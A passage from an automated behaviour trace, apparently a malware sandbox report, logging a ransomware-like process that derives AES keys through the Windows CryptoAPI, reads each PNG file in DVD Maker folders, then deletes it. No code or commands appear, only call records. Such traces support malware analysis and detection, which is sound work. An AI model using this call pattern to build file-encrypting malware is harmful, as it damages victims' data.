lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.935] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.935] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.935] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.936] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png")) returned 0 [0142.937] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.938] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.938] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.938] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.938] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a88 [0142.938] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.945] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.945] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.945] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.946] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png")) returned 0 [0142.988] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.989] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.989] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.989] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.989] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x280e [0142.989] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.992] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.992] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.992] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.994] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png")) returned 0 [0142.994] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.995] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.995] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.995] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.995] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2808 [0142.995] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.998] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.998] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.998] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.999] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png")) returned 0 [0143.000] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.000] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.000] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.000] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.000] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x946 [0143.000] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.002] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.002] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.002] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.004] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png")) returned 0 [0143.004] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.005] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.005] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.005] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.005] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6bbd [0143.005] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.008] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.008] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.008] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.010] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png")) returned 0 [0143.010] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.011] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.011] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.011] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.011] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb53 [0143.011] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.013] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.013] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.013] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.014] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png")) returned 0 [0143.014] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.015] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.015] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.015] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.015] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a88 [0143.015] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.018] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.018] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.018] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.019] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png")) returned 0 [0143.020] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.021] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.021] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.021] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.021] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a7ed [0143.021] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.029] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.029] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.029] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.030] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png")) returned 0 [0143.031] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.031] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.031] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.031] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.031] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4f7a [0143.031] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.035] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.035] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.035] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.036] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png")) returned 0 [0143.037] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.038] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.038] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.038] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.038] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x390c4 [0143.038] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.052] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.052] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.052] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.054] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png")) returned 0 [0143.054] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.055] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.055] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.055] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.055] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1368 [0143.055] ReadFile (in: hFile=0x43c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.058] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.058] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.058] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.059] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png")) returned 0 [0143.060] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.060] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.060] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.060] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0143.060] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc47 [0143.060] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.115] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.115] CryptDestroyKey (hKey=0x284d668) returned 1 [0143.115] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.116] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png")) returned 0 [0143.117] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.118] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.118] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.118] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0143.118] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12ea [0143.118] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.121] CryptDestroyHash (hHash=0x284d568) returned 1 [0143.121] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.121] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.122] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png")) returned 0 [0143.122] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.123] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.123] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.123] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0143.123] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0143.123] ReadFile (in: hFile=0x43c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.126] CryptDestroyHash (hHash=0x284d668) returned 1 [0143.126] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.126] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.127] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png")) returned 0 [0143.127] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.128] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.128] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.128] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0143.128] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0143.128] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.130] CryptDestroyHash (hHash=0x284d568) returned 1 [0143.130] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.130] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.131] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png")) returned 0 [0143.132] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.132] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.132] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.132] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0143.132] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0143.133] ReadFile (in: hFile=0x43c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.135] CryptDestroyHash (hHash=0x284d668) returned 1 [0143.135] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.135] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.137] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png")) returned 0 [0143.137] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.138] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.138] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.138] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0143.138] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0143.138] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.149] CryptDestroyHash (hHash=0x284d568) returned 1 [0143.149] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.149] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.150] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png")) returned 0 [0143.151] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.152] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.152] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.152] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0143.152] GetFileSize (in: hFile=0x43c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0143.152] ReadFile (in: hFile=0x43c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0143.155] CryptDestroyHash (hHash=0x284d668) returned 1 [0143.155] CryptDestroyKey (hKey=0x284d528) returned 1 [0143.155] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0143.156] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png")) returned 0 [0143.156] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0143.157] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0143.157] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.157] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: 